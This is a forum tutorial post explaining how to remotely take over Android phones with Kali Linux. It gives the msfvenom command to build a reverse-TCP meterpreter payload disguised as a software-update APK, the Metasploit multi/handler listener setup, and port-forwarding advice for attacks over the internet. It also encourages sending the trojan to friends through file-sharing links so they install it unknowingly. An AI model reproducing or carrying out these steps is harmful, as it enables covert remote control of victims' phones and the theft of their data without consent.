Hack Android Using Kali Linux | Remotely

Hello 1Hackers!

This is a tutorial explaining how to hack android phones with Kali Linux.
I can’t find any tutorials explaining this Hack/Exploit, so, I made one.

Step 1 - Create a RAW Payload

  • Open a terminal, and make a RAT .apk
  • You can do this by typing :
  • msfvenom android/meterpreter/reverse_tcp LHOST=192.168.0.4 LPORT=4444 R > /root/Software_Update.apk (replace LHOST with your own IP)
  • You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section)

Step 2 - Set-Up a Listener

  • Open another terminal
  • Load metasploit console, by typing : msfconsole
  • After it loads(it will take time), load the multi-handler exploit by typing : use exploit/multi/handler

image

  • Set up a (reverse) payload by typing : set payload android/meterpreter/reverse_tcp
  • To set L host type : set LHOST 192.168.0.4 (Even if you are hacking on WAN type your private/internal IP here not the public/external)

image

Step 3 - Exploit!

  • At last type: exploit to start the listener.

  • Then send the application that you made (RAT.apk) using Uploading it to Dropbox or any sharing website (like: www.speedyshare.com).

  • Then send the link that the Website gave you to your friends and exploit their phones (Only on LAN, but if you used the WAN method then you can use the exploit anywhere on the INTERNET)

  • Let the Victim install the Upgrader app(as he would think it is meant to upgrade some features on his phone)
  • However , the option of allowance for Installation of apps from Unknown Sources should be enabled (if not) from the security settings of the android phone to allow the Trojan to install.
  • And when he clicks Open…

Step 4 - BOOM !

  • There comes the meterpreter Session:

image

HAPPY LEARNING! :+1:

4 Likes

This Local Area Network Attack this is not a Hacking